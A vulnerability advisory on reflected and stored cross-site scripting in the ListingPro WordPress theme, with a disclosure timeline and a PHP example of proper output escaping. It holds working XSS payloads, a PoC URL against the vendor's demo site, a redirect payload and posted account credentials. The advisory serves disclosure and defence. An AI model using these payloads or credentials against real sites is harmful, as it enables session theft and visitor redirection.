wpexploit / SUBVΞRSΛ
WPEX-ID: 094B8E8B-950F-451D-9D64-460918C8B255
History: Nov 29, 2019 - 12:00 a.m.

ListingPro < 2.0.14.5 - Reflected & Persistent Cross-Site Scripting


EPSS: 0.001 (Low), percentile 37.5%

Reflected & Persistent XSS was discovered in the ‘ListingPro - WordPress Directory Theme’. Current version is 2.0.14.2 (August 9th 2019).

Edit (WPScanTeam), timeline:
November 29th, 2019 - Envato informed.
November 29th, 2019 - Envato investigating.
December 4th, 2019 - v2.0.14.3 released, fixing the reflected XSS but not the stored one. Envato notified again.
December 5th, 2019 - v2.0.14.4 released, stored XSS still present.
December 5th, 2019 - Envato confirmed stored XSS still present.
December 12th, 2019 - v2.0.14.5 released, fixing the stored XSS.

----[]- Reflected XSS: -[]----
Use your payload inside the «What» input field on the homepage (https://classic.listingprowp.com/) and submit the form; the payload is triggered in the response.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing


----[]- Persistent XSS: -[]----
You need a basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page to submit a new listing. Choose the «Free» plan and press the «Continue» button. On the next page choose any category; after that you'll see the vulnerable input fields: «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field, «Good For»). Use your payload inside the vulnerable input field(s) and save your listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.
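As an added illustration (not ListingPro's actual code, whose internals this advisory does not show), the unsafe output pattern that lets the «What» field payload in the `select` parameter break out of its attribute, beside the hardened form; the function names are hypothetical, and outside WordPress htmlspecialchars() and strip_tags() stand in for esc_attr() and sanitize_text_field().

```php
<?php
// Added illustration, not theme code: the reflected bug is an
// output-escaping failure, so the fix is escaping at the point of output.
// Stored fields need the same escaping plus sanitization on save.

// VULNERABLE PATTERN: the raw `select` query value is echoed back into
// value="", so a leading "> closes the attribute and the tag.
function render_what_field_vulnerable(string $select): string {
    return '<input type="text" name="select" value="' . $select . '">';
}

// HARDENED: escape for the HTML-attribute context at output time.
// In a WordPress theme this is esc_attr( $select ); htmlspecialchars()
// with ENT_QUOTES is the plain-PHP equivalent (encodes & " ' < >).
function render_what_field_safe(string $select): string {
    $escaped = htmlspecialchars($select, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="select" value="' . $escaped . '">';
}

// Stored fields ("Best Day/Night", "Good For"): strip markup on save
// (sanitize_text_field() in WordPress) AND still escape on every output,
// because the database is not a trusted source.
function sanitize_listing_field(string $value): string {
    return trim(strip_tags($value));
}
function render_listing_field_safe(string $stored): string {
    $escaped = htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<span class="good-for">' . $escaped . '</span>';
}

// Regression check a reviewer can run: after hardening, the payload must
// never yield a new tag opener anywhere in the rendered markup.
function output_is_tag_free_after_escaping(string $payload): bool {
    $reflected = render_what_field_safe($payload);
    $stored    = render_listing_field_safe(sanitize_listing_field($payload));
    return strpos($reflected, '<img') === false
        && strpos($stored, '<img') === false;
}

// Payload samples quoted from the advisory above.
$samples = [
    '"><img src=x onerror=alert(`SUBVΞRSΛ`)>',
    '"><img src=x onerror=alert(document.cookie)>',
];
foreach ($samples as $p) {
    echo "vulnerable: " . render_what_field_vulnerable($p) . "\n";
    echo "hardened  : " . render_what_field_safe($p) . "\n";
    echo "check     : " . (output_is_tag_free_after_escaping($p) ? "PASS" : "FAIL") . "\n";
}
```

Run with `php example.php`: the vulnerable line shows the injected `<img>` tag intact, while the hardened line renders the payload as inert `&quot;&gt;&lt;img ...` text and both checks print PASS.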

